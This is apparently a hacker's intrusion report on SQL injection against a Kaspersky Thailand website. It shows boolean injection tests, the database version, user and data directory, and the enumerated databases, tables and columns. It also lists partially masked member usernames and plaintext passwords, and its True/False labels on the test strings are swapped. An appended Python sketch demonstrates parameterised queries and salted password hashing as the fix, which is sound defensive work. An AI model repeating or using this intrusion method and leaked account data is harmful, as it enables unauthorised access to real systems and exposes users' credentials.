Kaspersky Thailand Full Access

 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/

                     #Kaspersky Thailand full access@c0de.breaker

Ok… As you might remember, some time ago, I gained access to Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because mod_security was ON, it was hard for me to make the injection, and in order to extract tables, columns, etc., you must have a vast knowledge about how to filter some things.

Testing:

and 1=1-- (False)

and 1=2-- (True)

Main Information:

#Version: 5.1.30
#User:thaikasp_forum@localhost
#Principal Database:thaikasp_dealer
#Datadir:/var/lib/mysql/

All databases:

#information_schema
#thaikasp_dealer
#thaikasp_forum

Tables from thaikasp_dealer:

#bkkplace
#newheader
#tb_dealer
#tb_part

Tables from thaikasp_forum:

#forum
#tbmember

Columns from tbmember

#ID
#Username
#Password

And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#tomsound:b_v***
#anukool:kas*****
#kaspersky2009:w***
#gm8kaspe*****

Admin Control Panel:

Yeah, finish.
Bye, TinKode
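
An added example, not part of the original post and not the site's code: a defender-side sketch of the two flaws the post describes, showing that the boolean test changes a concatenated query but is inert once the value is bound, and that a dumped tbmember table holds no plaintext when passwords are stored as salted PBKDF2 hashes. Assumptions: SQLite stands in for the site's MySQL, the Salt column, the function names, the iteration count and the sample account are constructed for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed value)

def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def make_db():
    # SQLite stands in for MySQL; Salt is an assumed extra column.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbmember (ID INTEGER PRIMARY KEY, "
               "Username TEXT UNIQUE, Password BLOB, Salt BLOB)")
    return db

def add_member(db, username, password):
    # Store only the salted hash, never the password itself.
    salt = os.urandom(16)
    db.execute("INSERT INTO tbmember (Username, Password, Salt) VALUES (?, ?, ?)",
               (username, hash_password(password, salt), salt))

def check_login(db, username, password):
    row = db.execute("SELECT Password, Salt FROM tbmember WHERE Username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison of stored and recomputed hashes.
    return hmac.compare_digest(row[0], hash_password(password, row[1]))

def lookup_concatenated(db, member_id):
    # Vulnerable pattern: the request value is pasted into the SQL text.
    sql = "SELECT Username FROM tbmember WHERE ID = " + member_id
    return db.execute(sql).fetchall()

def lookup_bound(db, member_id):
    # Hardened pattern: the value is bound and never parsed as SQL.
    return db.execute("SELECT Username FROM tbmember WHERE ID = ?",
                      (member_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    add_member(db, "member_a", "constructed-sample-pw")  # constructed account
    for value in ("1", "1 and 1=1", "1 and 1=2"):
        print(repr(value), lookup_concatenated(db, value), lookup_bound(db, value))
    print(db.execute("SELECT Password FROM tbmember").fetchone()[0].hex())
```

A WAF such as mod_security sits in front of this code as a filter; the bound query is what removes the injection point itself.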
